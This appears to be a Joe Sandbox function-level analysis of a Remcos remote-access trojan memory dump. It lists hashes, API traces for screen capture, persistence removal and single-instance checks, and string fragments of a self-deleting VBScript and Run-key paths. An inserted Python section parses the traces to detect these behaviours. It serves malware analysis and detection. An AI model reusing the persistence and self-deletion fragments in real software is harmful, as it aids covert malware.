• Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
• Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
• Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
• Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
• Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
• Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
• Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
• Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
• Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                                  • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                                                                                  • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                  • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                                  • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                                                                                  • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                  • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
• DeleteDC.GDI32(00000000), ref: 00418F65
• DeleteDC.GDI32(00000000), ref: 00418F68
• DeleteObject.GDI32(00000000), ref: 00418F6B
• SelectObject.GDI32(00000000,00000000), ref: 00418F8C
• DeleteDC.GDI32(00000000), ref: 00418F9D
• DeleteDC.GDI32(00000000), ref: 00418FA0
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
• GetCursorInfo.USER32(?), ref: 00418FE2
• GetIconInfo.USER32 ref: 00418FF8
• DeleteObject.GDI32(?), ref: 00419027
• DeleteObject.GDI32(?), ref: 00419034
• DrawIcon.USER32(00000000,?,?,?), ref: 00419041
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
• GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
• LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
• GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
• DeleteDC.GDI32(?), ref: 004191B7
• DeleteDC.GDI32(00000000), ref: 004191BA
• DeleteObject.GDI32(00000000), ref: 004191BD
• GlobalFree.KERNEL32(?), ref: 004191C8
• DeleteObject.GDI32(00000000), ref: 0041927C
• GlobalFree.KERNEL32(?), ref: 00419283
• DeleteDC.GDI32(?), ref: 00419293
• DeleteDC.GDI32(00000000), ref: 0041929E
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 4256916514-865373369
• Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
• Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
• Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
• Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
• ExitProcess.KERNEL32 ref: 0040D80B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-1447701601
• Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
• Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
• Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
• Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
• ExitProcess.KERNEL32 ref: 0040D454
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
• API String ID: 3797177996-2483056239
• Opcode ID: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
• Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
• Opcode Fuzzy Hash: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
• Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
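The two functions above (0040D558 and 0040D1E0) show the same routine from two call paths: delete the HKCU Run / Policies\Explorer\Run persistence entry (RegDeleteKeyA), strip file attributes, hand a FileSystemObject script (`while fso.FileExists(" … wend`, `fso.DeleteFile(Wscript.ScriptFullName)`) to ShellExecuteW with the `open` verb, and ExitProcess. A running image cannot unlink itself, so the script waits for the exe to disappear and then removes itself. The following is an added example, not Joe Sandbox tooling or Remcos code: it parses this report's API-trace and String ID lines (copied verbatim as constructed input) into records and applies two behaviour rules whose names and thresholds are this example's own assumptions; it also covers the CreateMutexA/ExitProcess single-instance check shown in the next function (004124CF).

```python
"""Parse per-function API traces from a Joe Sandbox function view and flag
behaviour patterns. Added example, not Joe Sandbox tooling or Remcos code.
Trace lines are copied from this report (functions 0040D1E0 and 004124CF of
the Remcos image in RegAsm.exe); the rule names are this example's assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args), ref: ADDR. Some calls carry no argument list at all.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when the call sits in a subroutine


def parse_block(text: str) -> Tuple[List[ApiCall], List[str]]:
    """Return (direct + subcall API calls, strings the function references)."""
    calls, strings = [], []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = tuple(raw.split(",")) if raw is not None else ()
            calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                 m.group("ref"), m.group("sub")))
            continue
        s = line.strip()
        if s.startswith("• String ID:"):
            # Joe Sandbox joins a function's strings with "$"
            strings.extend(s[len("• String ID:"):].strip().split("$"))
    return calls, strings


def looks_like_self_uninstall(calls: List[ApiCall], strings: List[str]) -> bool:
    """Run-key deletion + FileSystemObject wait/delete loop + ShellExecuteW(open)
    + ExitProcess: the exe delegates its own removal to a script."""
    apis = {c.api for c in calls}
    touches_run_key = any(s.endswith("CurrentVersion\\Run\\") for s in strings)
    has_wait_loop = (any(s.startswith("while fso.FileExists(") for s in strings)
                     and "wend" in strings)
    deletes_self = "fso.DeleteFile(Wscript.ScriptFullName)" in strings
    spawns = any(c.api == "ShellExecuteW" and len(c.args) > 1 and c.args[1] == "open"
                 for c in calls)
    return ("RegDeleteKeyA" in apis and "ExitProcess" in apis
            and touches_run_key and has_wait_loop and deletes_self and spawns)


def looks_like_single_instance_guard(calls: List[ApiCall]) -> bool:
    """CreateMutexA immediately followed (by call-site address) by ExitProcess:
    the usual 'already running, bail out' check."""
    direct = sorted((c for c in calls if c.subcall is None),
                    key=lambda c: int(c.ref, 16))
    return any(a.api == "CreateMutexA" and b.api == "ExitProcess"
               for a, b in zip(direct, direct[1:]))


def analyze(text: str) -> dict:
    calls, strings = parse_block(text)
    return {
        "calls": len(calls),
        "direct_calls": sum(c.subcall is None for c in calls),
        "self_uninstall": looks_like_self_uninstall(calls, strings),
        "single_instance_guard": looks_like_single_instance_guard(calls),
    }


# Constructed input: lines copied from the report's function view.
UNINSTALL_FN = r"""
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
• ExitProcess.KERNEL32 ref: 0040D454
• String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
"""

MUTEX_FN = r"""
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
• ExitProcess.KERNEL32(00000000), ref: 004124DB
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
• GetCurrentProcessId.KERNEL32 ref: 0041257C
• lstrcatW.KERNEL32(?,.exe), ref: 0041263C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
• String ID: .exe$8SG$WDH$exepath$open$temp_
"""

if __name__ == "__main__":
    for name, block in (("0040D1E0", UNINSTALL_FN), ("004124CF", MUTEX_FN)):
        print(name, analyze(block))
```

The rules deliberately require both the API evidence and the script fragments: ShellExecuteW(open) plus ExitProcess on its own is how any updater restarts itself, and it is the `while fso.FileExists(` / `wend` / `Wscript.ScriptFullName` triple next to RegDeleteKeyA that makes this a cleanup routine rather than an update. The same parser can be pointed at any other function block in this view.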
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
• ExitProcess.KERNEL32(00000000), ref: 004124DB
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
• CloseHandle.KERNEL32(00000000), ref: 00412576
• GetCurrentProcessId.KERNEL32 ref: 0041257C
• PathFileExistsW.SHLWAPI(?), ref: 004125AD
• GetTempPathW.KERNEL32(00000104,?), ref: 00412610
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
• lstrcatW.KERNEL32(?,.exe), ref: 0041263C
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
• Sleep.KERNEL32(000001F4), ref: 004126BD
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
• CloseHandle.KERNEL32(00000000), ref: 004126E4
• GetCurrentProcessId.KERNEL32 ref: 004126EA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$8SG$WDH$exepath$open$temp_
• API String ID: 2649220323-436679193
• Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
• Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
• Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
• Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
